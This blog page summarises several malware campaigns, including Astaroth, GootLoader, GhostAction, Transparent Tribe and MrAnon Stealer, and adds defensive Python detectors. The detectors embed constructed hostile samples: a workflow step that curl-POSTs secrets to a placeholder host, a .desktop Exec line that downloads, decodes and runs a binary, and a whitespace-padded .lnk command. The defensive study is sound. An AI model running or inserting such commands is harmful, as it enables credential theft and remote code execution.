Showing posts with label Malicious Files.

WhatsApp-Based Astaroth Banking Trojan Targets Brazilian Users in New Malware Campaign

Acronis Threat Research has documented a campaign that spreads the Astaroth banking trojan through WhatsApp, mainly to users in Brazil. The analysts call it Boto Cor-de-Rosa, and what sets it apart is that it trades on the trust people place in a platform they already use. Instead of relying on email or lookalike websites, the attackers send the malware from compromised accounts as a link or attachment inside real conversations.
The tactic itself is not new, but its fit with local habits makes it hard to spot. Where nearly everyone uses WhatsApp every day, a file from a known contact draws little suspicion, and researchers stress that an ordinary-looking message from a compromised account can now carry the payload. Unlike older campaigns, this one avoids anything flashy and favours quiet infiltration; as user behaviour moves to messaging apps, so do the attackers, persistently and without fanfare.

Acronis reports that the malware harvests the victim's WhatsApp contact list and sends the malicious message to each contact automatically, so the campaign spreads without constant operator input. The core Astaroth component is still written in Delphi and the setup script is still Visual Basic, but the analysts found a new worm-style propagation module written entirely in Python. The mix of languages shows operators building adaptable toolkits by assigning each job to a separate component, which makes the whole system easier to modify and harder to fingerprint.

Astaroth, also tracked as Guildma, has been active since 2015 and concentrates on Brazil within Latin America. Credential theft in support of financial fraud is its core business. In 2024 several clusters, including PINEAPPLE and Water Makara, distributed it through phishing email. The newest push moves away from email and onto WhatsApp, where a fake request from a known contact is far more believable because so many people rely on the app daily.

Although the delivery channel shifts, the aim stays the same. Abusing WhatsApp to spread banking trojans is not new, but it has accelerated lately: Trend Micro earlier observed the Water Saci group using comparable methods to push financial malware including Maverick and a Casbaneiro variant, a sign that messaging apps now look more attractive to attackers than classic email phishing. Later, Sophos disclosed details of an evolving cluster it labels STAC3150, closely tied to those earlier patterns, which targeted WhatsApp users in Brazil and distributed Astaroth through the same kind of deceptive messages.

More than 95 percent of the infected machines Sophos saw were in Brazil, with isolated cases in the United States and Austria. Running continuously since early autumn 2025, that activity relied on compressed archives containing installer files that trigger script-based downloads of the final payload. Acronis's findings fit that picture: the WhatsApp messages carry a ZIP file sent directly to the user; inside is what looks like a harmless document but is actually a Visual Basic Script, and once run, the script pulls further components from remote servers.

That download kicks off the full infection chain. After activation the malware splits into two functions: one spreads outward, pulling contact data from WhatsApp and sending the infected file on without any user input, while the other runs hidden, watching browsing activity for visits to financial sites so it can capture login details.

The propagation module also reports back continuously, feeding the operators live counts of messages sent successfully or failed, along with sending rate. Those embedded reporting routines, which Acronis identified in the code, give the attackers a constant stream of operational insight.

GootLoader Malware Uses Malformed ZIP Archives to Evade Detection

Cybercriminals using GootLoader, a JavaScript-based malware loader, have adopted a new tactic: instead of standard archives they distribute deliberately malformed ZIP files built to slip past defenses. The flawed archives exploit differences between decompression implementations, some of which fail on them entirely while others extract them only partially. That mismatch keeps the malicious script hidden during scans yet lets it run normally when the victim opens the file. Findings detailed by Expel show how inconsistent parsing logic plays into attackers' hands: the hidden script surfaces only when handled by the specific extractor found on a typical user's machine.

The structure is unusual: roughly 500 to 1,000 small archives are concatenated into one large file. Because of that layering, standard tools such as WinRAR and 7-Zip, which analysts often rely on during malware triage, cannot read the file properly, and automated detection systems confused by it frequently skip examining the contents. Opened with Windows' own built-in extraction, however, the file works without issue.

That smooth handling lets victims unpack the dangerous content unaware. GootLoader has been a fixture of the threat landscape since 2020, spreading mainly through poisoned search results and deceptive online ads. People looking for official forms or corporate paperwork land on compromised WordPress sites that serve the infected archive, and opening it triggers the payload delivery mechanism embedded in the loader. Acting as an initial-access tool, it paves the way for additional malware, with ransomware a frequent outcome.

The infection chain begins quietly and escalates fast, under the radar. By late 2025 Expel's researchers had noticed further refinements that show how the method keeps shifting. Beyond stacking archives, the operators now shorten key metadata in the ZIP structure, tampering in particular with the end of central directory (EOCD) record that tells a parser where the file list lives. That tweak breaks numerous analysis programs, yet the files still open in Windows Explorer.

Non-essential sections inside the package are scrambled as well, throwing off predictable parsing patterns and making automated inspection harder. Researchers call the approach "hashbusting": each target receives a distinct ZIP file, and because the archive's layout and data differ with every download, standard hash checks never match. Even the JavaScript inside changes form from one instance to the next, so detection that relies on repeated patterns struggles.
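Both archive tricks described above (stacked archives and a shortened EOCD record), and the document-lookalike script inside the WhatsApp ZIP in the Astaroth post earlier on this page, come down to how a given parser walks a ZIP's central directory. The Python below is an added example, not code from Expel, Acronis or the malware itself: it finds every end-of-central-directory record in a blob, walks the directory each one points to (using the EOCD position rather than byte 0 as the base, so appended archives are found), reports truncation and executable extensions behind document names, and compares that with what Python's stdlib zipfile module sees. The sample archives are constructed inline and the extension list is an illustrative assumption.

```python
import io
import struct
import zipfile
from pathlib import PurePosixPath

EOCD_SIG = b"PK\x05\x06"   # end of central directory record
CDH_SIG = b"PK\x01\x02"    # central directory file header
# Extensions that execute on double-click; "Invoice.pdf.vbs" is a document
# lookalike. Illustrative assumption, extend to taste.
EXEC_EXT = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1",
            ".bat", ".cmd", ".lnk", ".scr", ".exe"}


def build_zip(entries):
    """Build an ordinary ZIP in memory from {name: bytes} (constructed input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def parse_central_directory(blob, eocd_off):
    """Walk the central directory that the EOCD record at eocd_off points to.

    Returns (entry_names, truncated). The directory offset stored in the
    EOCD is relative to the start of *its own* archive, so for an archive
    appended to another file the real base is derived from where the EOCD
    sits, not from byte 0. A record shorter than 22 bytes is reported as
    truncated; the total-entries, size and offset fields (bytes 10..19)
    are still usable if present.
    """
    avail = len(blob) - eocd_off
    if avail < 20:
        return [], True
    n_total, cd_size, cd_off = struct.unpack_from("<HII", blob, eocd_off + 10)
    truncated = avail < 22
    base = eocd_off - cd_size - cd_off
    if base < 0:
        return [], truncated
    pos, names = base + cd_off, []
    for _ in range(n_total):
        if blob[pos:pos + 4] != CDH_SIG:
            break
        n_len, e_len, c_len = struct.unpack_from("<HHH", blob, pos + 28)
        names.append(blob[pos + 46:pos + 46 + n_len].decode("utf-8", "replace"))
        pos += 46 + n_len + e_len + c_len
    return names, truncated


def analyze(blob):
    """Enumerate every embedded archive and flag executable entries."""
    eocds, i = [], blob.find(EOCD_SIG)
    while i != -1:
        eocds.append(i)
        i = blob.find(EOCD_SIG, i + 1)
    archives, truncated = [], False
    for off in eocds:
        names, trunc = parse_central_directory(blob, off)
        archives.append(names)
        truncated = truncated or trunc
    suspicious = [n for names in archives for n in names
                  if PurePosixPath(n).suffix.lower() in EXEC_EXT]
    return {"eocd_count": len(eocds), "concatenated": len(eocds) > 1,
            "truncated_eocd": truncated, "archives": archives,
            "suspicious": suspicious}


def names_seen_by_zipfile(blob):
    """What the stdlib zipfile module reports, or None if it rejects the file."""
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            return zf.namelist()
    except (zipfile.BadZipFile, struct.error):
        return None


# Constructed samples, not real malware: a decoy document archive, a script
# named to look like that document, the two stacked into one file, and a
# copy with the EOCD record cut short (its 2-byte comment-length field removed).
DECOY = build_zip({"Invoice_2025.pdf": b"%PDF-1.4 decoy"})
DROPPER = build_zip({"Invoice_2025.pdf.vbs": b"WScript.Echo 1"})
CONCATENATED = DECOY + DROPPER
TRUNCATED = DECOY[:-2]

if __name__ == "__main__":
    for label, blob in (("decoy", DECOY), ("concatenated", CONCATENATED),
                        ("truncated", TRUNCATED)):
        print(label, analyze(blob), "| zipfile sees:", names_seen_by_zipfile(blob))
```

Running it shows three views of the same bytes disagree: the manual walk reports two archives in the stacked file with the script in the second, zipfile reports only the last archive's entry, and the truncated copy is rejected by zipfile but still enumerable by hand. For triage, treat more than one EOCD, an EOCD shorter than 22 bytes, or an executable extension behind a document name as reasons to detonate the file with the extractor the victim would use rather than trusting a single library's view.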

The delivery method is equally hard to catch. Rather than sending a typical ZIP archive, the site transmits the malicious code as an XOR-encoded stream of data that is rebuilt only after it reaches the target's browser. The script also inflates itself by appending copies of its own content repeatedly until it reaches a specific size, past the limits at which many scanners stop inspecting compressed files. After launch, the script runs through built-in Windows tools and never needs a full unpacking step, so the attack unfolds without drawing attention.

Once active, it persists by placing a shortcut in the Windows Startup folder, then triggers further scripts through native utilities such as cscript.exe and PowerShell. Data collection begins next: details about the system are gathered and sent back to the attackers' command-and-control servers, setting up the next stage without delay.

Often overlooked, restricting the Windows Script Host binaries (wscript.exe and cscript.exe) blocks this and many similar chains. Re-associating .js, .jse, .vbs, .vbe and .wsf files with a plain text viewer such as Notepad, instead of the script host, means a double-click displays the code rather than running it, and Windows Script Host can be disabled outright through its Enabled value under Windows Script Host\Settings in the registry. As GootLoader's shifts over time show, attackers keep twisting everyday OS functions into stealthy weapons and stay active even as defenses improve.

GitHub Supply Chain Attack ‘GhostAction’ Exposes Over 3,000 Secrets Across Ecosystems

A newly uncovered supply chain attack on GitHub, named GhostAction, has compromised more than 3,300 secrets across multiple ecosystems, including PyPI, npm, DockerHub, GitHub, Cloudflare and AWS. GitGuardian researchers first identified the campaign when they traced early signs of suspicious activity in the FastUUID project on September 2, 2025. The attack relied on compromised maintainer accounts, which were used to commit malicious workflow files into repositories. These GitHub Actions workflows were configured to trigger on push events or on manual dispatch, so the attackers could run them at will to extract sensitive information.

Once executed, the malicious workflow harvested secrets from GitHub Actions environments and transmitted them to an attacker-controlled server through a curl POST request. In FastUUID’s case, the attackers accessed the project’s PyPI token, although no malicious package versions were published before the compromise was detected and contained. Further investigation revealed that the attack extended well beyond a single project. Researchers found similar workflow injections across at least 817 repositories, all exfiltrating data to the same domain. To maximize impact, the attackers enumerated secret variables from existing legitimate workflows and embedded them into their own files, ensuring multiple types of secrets could be stolen. 
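A quick way to catch the pattern described above, a workflow step that references repository secrets and pushes them to a host outside the build's normal endpoints, is to audit workflow files before they run. The Python below is an added example, not GitGuardian's tooling or anything from the affected projects. It avoids a YAML dependency and splits `steps:` lists line by line, which is adequate for the conventional block layout of workflow files; the allow-list of hosts and the sample workflow are constructed assumptions.

```python
import re

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)")
NET_TOOLS = re.compile(r"\b(curl|wget|Invoke-WebRequest|nc)\b")
# Hosts a publishing workflow is expected to contact (assumption: tune per org).
ALLOWED_HOSTS = {"github.com", "api.github.com", "upload.pypi.org",
                 "registry.npmjs.org"}


def split_steps(workflow_text):
    """Return the text of each `- ` item under every `steps:` list.

    Line-oriented on purpose so it runs with no third-party YAML module;
    it relies on the conventional block layout of GitHub workflow files.
    """
    steps, current, step_indent, in_steps = [], [], None, False
    for line in workflow_text.splitlines():
        stripped = line.lstrip()
        indent = len(line) - len(stripped)
        if stripped.startswith("steps:"):
            in_steps, step_indent = True, None
            continue
        if not in_steps:
            continue
        if step_indent is None:
            if stripped.startswith("- "):
                step_indent = indent          # indentation of the list items
            else:
                continue
        if stripped and indent < step_indent:  # dedented out of the list
            in_steps = False
            if current:
                steps.append("\n".join(current))
                current = []
        elif stripped.startswith("- ") and indent == step_indent:
            if current:
                steps.append("\n".join(current))
            current = [line]
        else:
            current.append(line)
    if current:
        steps.append("\n".join(current))
    return steps


def audit_workflow(workflow_text):
    """Flag steps that both reference secrets and reach a non-allow-listed host."""
    findings = []
    for n, step in enumerate(split_steps(workflow_text), 1):
        secrets = sorted(set(SECRET_REF.findall(step)))
        external = sorted({h for h in URL_HOST.findall(step) if h not in ALLOWED_HOSTS})
        if secrets and external and NET_TOOLS.search(step):
            findings.append({"step": n, "secrets": secrets, "hosts": external})
    return findings


# Constructed workflow (not one of the affected repositories): a legitimate
# publish step followed by an injected "telemetry" step that posts three
# secrets to an outside host.
SAMPLE_WORKFLOW = """\
name: Release
on:
  push:
  workflow_dispatch:
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Publish to PyPI
        env:
          TWINE_PASSWORD: ${{ secrets.PYPI_TOKEN }}
        run: python -m twine upload dist/*
      - name: Telemetry
        run: |
          curl -s -X POST https://example.invalid/collect \\
            -d "pypi=${{ secrets.PYPI_TOKEN }}" \\
            -d "npm=${{ secrets.NPM_TOKEN }}" \\
            -d "aws=${{ secrets.AWS_SECRET_ACCESS_KEY }}"
"""

if __name__ == "__main__":
    for f in audit_workflow(SAMPLE_WORKFLOW):
        print(f"step {f['step']}: sends {f['secrets']} to {f['hosts']}")
```

Run it over `.github/workflows/*.yml` as a required check on any pull request that touches that directory. Name-based matching is easy to evade (a base64-encoded URL, or a secret copied into an environment variable and sent by a script fetched at run time), so pair it with CODEOWNERS protection on the workflows directory, trusted publishing via OIDC so no long-lived PyPI or npm token exists to steal, and egress monitoring on the runners.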

GitGuardian publicly disclosed the findings on September 5, opening issues in 573 affected repositories and notifying security teams at GitHub, npm and PyPI. By then, about 100 repositories had already spotted the unauthorized commits and reverted them. Soon after the disclosures, the exfiltration endpoint went offline, halting further data transfers.

The scope of the incident is significant, with researchers estimating that roughly 3,325 secrets were exposed. These included API tokens, access keys, and database credentials spanning several major platforms. At least nine npm packages and 15 PyPI projects remain directly affected, with the risk that compromised tokens could allow the release of malicious or trojanized versions if not revoked. GitGuardian noted that some companies had their entire SDK portfolios compromised, with repositories in Python, Rust, JavaScript, and Go impacted simultaneously. 

While the attack bears some resemblance to the s1ngularity campaign reported in late August, GitGuardian stated that it does not see a direct connection between the two. Instead, GhostAction appears to represent a distinct, large-scale attempt to exploit open-source ecosystems through stolen maintainer credentials and poisoned automation workflows. The findings underscore the growing challenges in securing supply chains that depend heavily on public code repositories and automated build systems.

Transparent Tribe Targets Indian Government's Custom Linux OS with Weaponized Desktop Files

Transparent Tribe, a cyber-espionage group believed to operate from Pakistan and also known as APT36, has stepped up its attacks on Indian government entities with malicious desktop shortcut files built to compromise both Windows hosts and machines running BOSS Linux, the government's custom Linux distribution.

The latest lures are spear-phishing emails carrying fake meeting notices. Attached are Linux .desktop launcher files disguised as PDF documents (e.g., "Meeting_Ltr_ID1543ops.pdf.desktop"). A .desktop file is a plain-text launcher whose Exec line runs an arbitrary command, so when the recipient opens what appears to be a PDF, the file instead executes a shell script that starts the attack chain.

The malicious script fetches a hex-encoded file from an attacker-controlled domain (“securestore[.]cv”), decodes it to an ELF binary, and saves it to the target computer's disk. During this process, the victim is shown a decoy PDF hosted on Google Drive, launched in Firefox, to avoid suspicion.

The dropped Go-based ELF binary then connects to a command-and-control (C2) server (“modgovindia[.]space:4000”), allowing attackers to issue commands, deliver additional malicious payloads, and steal sensitive data. 

The campaign ensures persistence with a cron job that relaunches the main payload after a reboot or if the process is killed. The malware carries reconnaissance capabilities and includes dummy anti-debugging and anti-sandbox techniques intended to frustrate analysts and automated analysis platforms.
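A freedesktop .desktop launcher is an INI-style text file, and whatever the `Exec=` key names runs when the icon is opened, which is why a file called Meeting_Ltr_ID1543ops.pdf.desktop can behave as described above. The Python below is an added example, not code from CloudSEK, Hunt.io or the campaign: it parses the `[Desktop Entry]` group and then scores the combination of signals the post describes, a document-style name, an inline shell command, a network fetch, a decode-and-execute step, backgrounding, and a decoy opened in a browser. The two launchers it checks are constructed, using placeholder domains rather than the real infrastructure, and the indicator regexes are assumptions.

```python
import re

# Indicators tested against the Exec= command (illustrative assumptions).
INDICATORS = {
    "inline shell": re.compile(r"\b(?:/bin/)?(?:ba|z|da)?sh\s+-c\b"),
    "network fetch": re.compile(r"\b(?:curl|wget)\b"),
    "decode step": re.compile(r"\b(?:xxd\s+-r|base64\s+-d|base64\s+--decode)\b"),
    "marks executable": re.compile(r"\bchmod\s+[ugoa]*\+?x\b|\bchmod\s+[0-7]{3,4}\b"),
    "detaches or persists": re.compile(r"\b(?:nohup|setsid|disown|crontab)\b"),
    "browser decoy": re.compile(r"\b(?:firefox|xdg-open|chromium|google-chrome)\b"),
}
DOC_EXT = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt")


def parse_desktop_entry(text):
    """Return the key/value pairs of the [Desktop Entry] group."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


def inspect_launcher(filename, text):
    """Score a .desktop file by the indicators its Exec= command trips."""
    entry = parse_desktop_entry(text)
    cmd = entry.get("Exec", "")
    hits = [label for label, rx in INDICATORS.items() if rx.search(cmd)]
    stem = filename[:-len(".desktop")] if filename.endswith(".desktop") else filename
    if stem.lower().endswith(DOC_EXT) or entry.get("Name", "").lower().endswith(DOC_EXT):
        hits.insert(0, "document-style name")
    # A shell one-liner with Terminal=false never shows the user a console.
    if (entry.get("Type") == "Application"
            and entry.get("Terminal", "").lower() == "false"
            and "inline shell" in hits):
        hits.append("hidden terminal")
    return {"name": entry.get("Name"), "exec": cmd, "indicators": hits,
            "verdict": "suspicious" if len(hits) >= 3 else "ok"}


# Constructed lure modelled on the described chain, with placeholder domains
# (example.invalid) in place of the real infrastructure; not the actual sample.
LURE_NAME = "Meeting_Ltr_ID1543ops.pdf.desktop"
LURE = """\
[Desktop Entry]
Type=Application
Name=Meeting_Ltr_ID1543ops.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -fsSL https://cdn.example.invalid/meeting.hex | xxd -r -p > /tmp/.m; chmod +x /tmp/.m; nohup /tmp/.m >/dev/null 2>&1 & firefox https://drive.google.com/file/d/placeholder"
"""

# An ordinary browser launcher for comparison (constructed).
BENIGN_NAME = "firefox.desktop"
BENIGN = """\
[Desktop Entry]
Type=Application
Name=Firefox Web Browser
Exec=firefox %u
Icon=firefox
Terminal=false
Categories=Network;WebBrowser;
"""

if __name__ == "__main__":
    for name, text in ((LURE_NAME, LURE), (BENIGN_NAME, BENIGN)):
        print(name, inspect_launcher(name, text))
```

Point it at mail-gateway attachments or at ~/Desktop and ~/.local/share/applications on BOSS Linux hosts. A single weak signal such as a browser launch is normal; the verdict turns on the combination, and the "document-style name" plus "inline shell" pair alone is worth an alert because no legitimate document launcher needs a shell.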

A known backdoor associated with the group, Poseidon, is deployed for deeper intrusion. Poseidon enables long-term access, data exfiltration, credential theft, and lateral movement within compromised environments. 

CloudSEK and Hunt.io, two cybersecurity firms, reported that this sophisticated campaign reflects APT36’s ongoing adaptation—modifying attacks based on the victim's operating system to maximize the success rate and persistence. 

In recent weeks, similar attacks by Transparent Tribe targeted Indian defense organizations using spoofed login pages intended to collect credentials and two-factor authentication (2FA) codes, especially the Kavach 2FA system widely adopted within Indian government agencies. 

The phishing pages, designed to closely resemble official Indian government sites, prompt users to enter both their email credentials and Kavach code. Typo-squatted domains and Pakistan-based infrastructure are consistently used, aligning with the group’s established tactics. 

Recent campaigns have also targeted countries such as Bangladesh, Nepal, Pakistan, Sri Lanka, and Turkey using spear-phishing emails that mimic governmental communication and leverage lookalike pages for credential theft. Another South Asian group, SideWinder, has employed similar techniques, using fake Zimbra and portal pages to gather government users’ login information, illustrating the widespread threat landscape in the region.

Windows Shortcut Vulnerability Exploited by 11 State-Sponsored Outfits

Since 2017, at least 11 state-sponsored threat groups have exploited an unpatched Microsoft zero-day that lets attackers abuse Windows shortcut files to steal data and conduct cyber espionage against organisations across multiple industries.

Threat analysts at Trend Micro's Zero Day Initiative (ZDI) found roughly 1,000 malicious .lnk files exploiting the flaw, tracked as ZDI-CAN-25373, which lets an attacker execute concealed malicious commands on a victim's PC via a customised shortcut file.

“By exploiting this vulnerability, an attacker can prepare a malicious .lnk file for delivery to a victim,” researchers at Trend Micro noted. “Upon examining the file using the Windows-provided user interface, the victim will not be able to tell that the file contains any malicious content.”

The malicious files delivered by cybercriminals include a variety of payloads, including the Lumma infostealer and the Remcos remote access Trojan (RAT), which expose organisations to data theft and cyber espionage. 
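To see why the Properties dialog is no help, it is worth looking at the .lnk format itself. A Shell Link file is a 76-byte header followed by optional structures and a sequence of length-prefixed strings, one of which is the command-line arguments; in the samples Trend Micro analysed, the real command sits behind a long run of whitespace characters so the visible part of the field looks empty (that detail comes from Trend Micro's write-up and is not stated on this page). The Python below is an added example, not Trend Micro's or Microsoft's code: it builds two constructed shortcuts, parses the header flags and the StringData section, and reports whitespace padding and interpreter use. The padding threshold and the interpreter list are assumptions.

```python
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046").bytes_le
# LinkFlags bits from the Shell Link specification (MS-SHLLINK).
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
# StringData fields appear in this fixed order, each present only if its flag is set.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))
WHITESPACE = " \t\r\n\x0b\x0c"
INTERPRETERS = ("cmd.exe", "powershell", "pwsh", "mshta", "wscript", "cscript",
                "rundll32", "regsvr32", "certutil")    # assumption: illustrative list
PAD_THRESHOLD = 16                                     # assumption


def build_lnk(relative_path, arguments):
    """Build a minimal Unicode .lnk (no IDList/LinkInfo); constructed sample."""
    flags = IS_UNICODE | HAS_RELPATH | HAS_ARGS
    header = struct.pack("<I16sIIQQQIIIHHII", 76, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = b""
    for text in (relative_path, arguments):
        body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body


def parse_lnk(blob):
    """Parse the ShellLinkHeader and StringData of a .lnk into a dict."""
    if len(blob) < 76 or blob[:4] != b"\x4c\x00\x00\x00" or blob[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", blob, 20)[0]
    pos = 76
    if flags & HAS_IDLIST:                       # skip LinkTargetIDList
        pos += 2 + struct.unpack_from("<H", blob, pos)[0]
    if flags & HAS_LINKINFO:                     # skip LinkInfo
        pos += struct.unpack_from("<I", blob, pos)[0]
    fields = {"flags": flags}
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", blob, pos)[0]   # CountCharacters
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = blob[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:                                    # ANSI: system code page, cp1252 assumed
            fields[key] = blob[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def inspect_lnk(blob):
    """Report whitespace padding in the arguments and interpreter use."""
    fields = parse_lnk(blob)
    args = fields.get("arguments", "")
    hidden = args.lstrip(WHITESPACE)
    padding = len(args) - len(hidden)
    control = sum(args.count(c) for c in "\t\r\n\x0b\x0c")
    findings = []
    if padding >= PAD_THRESHOLD or control:
        findings.append(f"arguments start with {padding} whitespace chars "
                        f"({control} control chars)")
    command = (fields.get("relative_path", "") + " " + hidden).lower()
    findings += [f"launches {tool}" for tool in INTERPRETERS if tool in command]
    return {"target": fields.get("relative_path", ""), "padding": padding,
            "hidden_args": hidden, "findings": findings}


# Constructed shortcuts: an ordinary one, and one whose command line is pushed
# out of view behind 300 spaces and a CRLF. The hidden command is harmless.
BENIGN = build_lnk(r"..\..\Windows\notepad.exe", r"C:\Users\Public\notes.txt")
PADDED = build_lnk(r"..\..\Windows\System32\cmd.exe", " " * 300 + "\r\n" + "/c calc.exe")

if __name__ == "__main__":
    print(inspect_lnk(BENIGN))
    print(inspect_lnk(PADDED))
```

Real-world shortcuts usually carry an IDList and LinkInfo block, which the parser skips by their declared sizes, and some older ones use ANSI strings. Any control character in the arguments field, or a leading whitespace run longer than a handful of characters, has no legitimate use and is a cheap signature for mail gateways and EDR to apply to .lnk files regardless of what payload follows.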

State-sponsored groups from North Korea, Iran, Russia and China, as well as non-state actors, are among those exploiting the flaw, in attacks that have hit organisations in the government, financial, telecommunications, military and energy sectors across North America, Europe, Asia, South America and Australia.

North Korean actors carried out 45% of the attacks, with Iran, Russia and China each accounting for roughly 18%. Groups named among the attackers include Evil Corp, Kimsuky, Bitter and Mustang Panda.

According to Trend Micro, Microsoft has not fixed the flaw despite receiving a proof-of-concept exploit through ZDI's bug bounty program. Trend Micro did not respond to a follow-up request for comment on its detection and submission timeline.

Microsoft's position remains that it will not be fixing the vulnerability described by Trend Micro at this time because it "does not meet the bar for immediate servicing under our severity classification guidelines," though the company "will consider addressing it in a future feature release," according to an email from a Microsoft spokesperson.

Meanwhile, Microsoft Defender can detect and block the threat behaviour Trend Micro describes, and Windows Smart App Control blocks untrusted files downloaded from the internet from running. Windows also treats shortcut (.lnk) files as a potentially dangerous file type and automatically warns users who attempt to download one.

MrAnon Stealer Propagates via Email with Fake Hotel Booking PDF

FortiGuard Labs researchers have uncovered an email phishing campaign that uses fraudulent hotel reservations to lure victims. The campaign delivers a malicious PDF that starts a chain of actions ending in the execution of the MrAnon Stealer malware.

Rather than depending on elaborate technical tricks, the attackers, as Hackread first reported, pose as a hotel reservation company. Their phishing emails carry the subject "December Room Availability Query" and fake holiday-season booking details; the attached PDF contains a download link that begins the infection.

FortiGuard Labs traced a multi-stage process involving .NET executables, PowerShell scripts and fake Windows Forms dialogs. The attackers steer the victim through these stages, using tricks such as a bogus error message to mask the fact that MrAnon Stealer has been launched successfully.

MrAnon Stealer runs in the background as a Python program packaged with cx_Freeze, which bundles the interpreter and code into an executable and complicates analysis. Its collection routine includes screenshot capture, public IP lookup and harvesting of sensitive data from a range of applications.

According to FortiGuard Labs, MrAnon Stealer targets cryptocurrency wallets, browsers and messaging apps including Discord, Discord Canary, Element, Signal and Telegram Desktop, as well as VPN clients such as NordVPN, ProtonVPN and OpenVPN Connect. Command and control runs over Telegram: using a bot token, the stolen data is posted to the attacker's Telegram channel together with system information and a download link.
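Because the stealer's only channel back to its operator is the Telegram Bot API, its traffic has a fixed shape: an HTTPS request to api.telegram.org whose path is /bot<token>/<method>, with the destination chat in the query string or body. The Python below is an added example, not FortiGuard's detection content: it scans proxy log lines for that path shape, groups hits by client and bot, extracts the method and chat ID, and redacts the token. The log lines are constructed in a simplified Squid-like format, and the token shape (numeric bot ID, colon, 35-character secret) is the documented one but is matched loosely.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Documented Bot API URL shape: https://api.telegram.org/bot<id>:<secret>/<method>
BOT_PATH = re.compile(r"^/bot(\d{6,12}):([A-Za-z0-9_-]{30,50})/(\w+)$")
# Methods a stealer calls to push loot; getUpdates and friends are tasking instead.
EXFIL_METHODS = {"sendDocument", "sendMessage", "sendPhoto", "sendVideo", "sendAudio"}


def parse_proxy_line(line):
    """Constructed line format: <timestamp> <client> <verb> <url> <status>."""
    parts = line.split()
    if len(parts) != 5:
        return None
    ts, client, verb, url, status = parts
    return {"ts": ts, "client": client, "verb": verb, "url": url, "status": status}


def telegram_bot_hit(url):
    """Return bot details if the URL is a Bot API call, else None."""
    u = urlsplit(url)
    if u.hostname != "api.telegram.org":
        return None
    m = BOT_PATH.match(u.path)
    if not m:
        return None
    bot_id, secret, method = m.groups()
    chat = parse_qs(u.query).get("chat_id", [None])[0]
    return {"bot_id": bot_id, "token_redacted": f"{bot_id}:{secret[:4]}...",
            "method": method, "chat_id": chat,
            "direction": "exfil" if method in EXFIL_METHODS else "other"}


def scan_proxy_log(lines):
    """One alert per (client, bot) pair, aggregating methods and chat IDs."""
    alerts = {}
    for line in lines:
        rec = parse_proxy_line(line)
        hit = telegram_bot_hit(rec["url"]) if rec else None
        if not hit:
            continue
        key = (rec["client"], hit["bot_id"])
        a = alerts.setdefault(key, {"client": rec["client"], "bot_id": hit["bot_id"],
                                     "token_redacted": hit["token_redacted"],
                                     "methods": set(), "chat_ids": set(),
                                     "first_seen": rec["ts"], "count": 0})
        a["methods"].add(hit["method"])
        if hit["chat_id"]:
            a["chat_ids"].add(hit["chat_id"])
        a["count"] += 1
    return list(alerts.values())


# Constructed proxy lines (not real infrastructure): normal browsing, one host
# talking to a Telegram bot, and an unrelated api.telegram.org request with no token.
SAMPLE_LOG = """\
2023-11-14T10:22:31Z 10.0.0.23 GET https://www.example.invalid/ 200
2023-11-14T10:22:40Z 10.0.0.23 POST https://api.telegram.org/bot1234567890:AAEjWd4d3kQ9XpM2vB7tLqR8sYnZc0HgKfU/sendMessage?chat_id=-1001234567890 200
2023-11-14T10:22:42Z 10.0.0.23 POST https://api.telegram.org/bot1234567890:AAEjWd4d3kQ9XpM2vB7tLqR8sYnZc0HgKfU/sendDocument?chat_id=-1001234567890 200
2023-11-14T10:23:05Z 10.0.0.41 GET https://api.telegram.org/ 200
""".splitlines()

if __name__ == "__main__":
    for alert in scan_proxy_log(SAMPLE_LOG):
        print(alert)
```

The URL path is only visible where TLS is inspected; without that, the same logic reduces to "which hosts resolve or connect to api.telegram.org", which is still a strong signal on servers and on workstations where no Telegram client is installed. The bot ID recovered here is also useful evidence: it identifies the operator's bot across victims, and the full token, if captured, lets responders read the bot's own getUpdates feed during an investigation.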

A spike in requests for the downloader URL in November 2023 shows the campaign was aggressive and active, with Germany the primary target. The operators also showed deliberate planning, switching from Cstealer in July and August to the more capable MrAnon Stealer in October and November.

Users should treat unexpected emails carrying unusual attachments with caution. Vigilance and common sense remain the best defence, since campaigns like this one rely on exploiting human trust rather than software flaws.

Threat Actors Distribute Around 400K Malicious Files Every Day to Attack Users

According to a recent report, threat actors released nearly 400,000 new malicious files per day in 2022 to deceive and attack users, a 5 percent rise over the 2021 figure.

Kaspersky's estimate puts the 2021 figure at about 380,000 malicious files detected daily, and the total for 2022 at 122 million malicious files, six million more than the year before.

